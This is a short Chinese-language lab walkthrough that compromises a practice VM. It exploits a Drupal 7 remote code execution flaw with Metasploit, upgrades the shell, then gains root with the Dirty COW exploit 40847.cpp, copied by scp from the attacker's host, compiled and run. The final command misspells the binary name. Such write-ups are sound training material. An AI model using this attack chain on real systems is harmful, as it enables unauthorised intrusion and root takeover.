方法一:
1.nmap扫描存活主机并确认靶机,我的是153
2.扫描开放端口
3.先访问1898端口,发现是个网站
4.用nikto扫描一下网站用那些目录或文件
访问UPGRADE.txt,提示升级drupal的信息
Drupal7有一个远程执行漏洞
5.用msfconsole工具进行攻击
1.搜索模块
2.使用模块
3.查看并设置选项
6.攻击
6.得到shell
在meterpreter >后加shell得到shell,在添加python -c ‘import pty; pty.spawn("/bin/bash")’
在创建完成后,我们此时就可以运行su命令了。(并且界面提示也变得更加友好)
7.提权
1.查看靶机内核版本uname -a
2.用./linux-exploit-suggester.sh查看可以攻击的脚本
我们选择dirtycow2攻击
用searchapolit进行搜索40847.cpp这个攻击脚本,将这件脚本复制到桌面,
再用scp上传到靶机scp root@192.168.34.189:/root/Desktop/40847.cpp ./
编译cpp文件:
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
./docw -s 即可得到root权限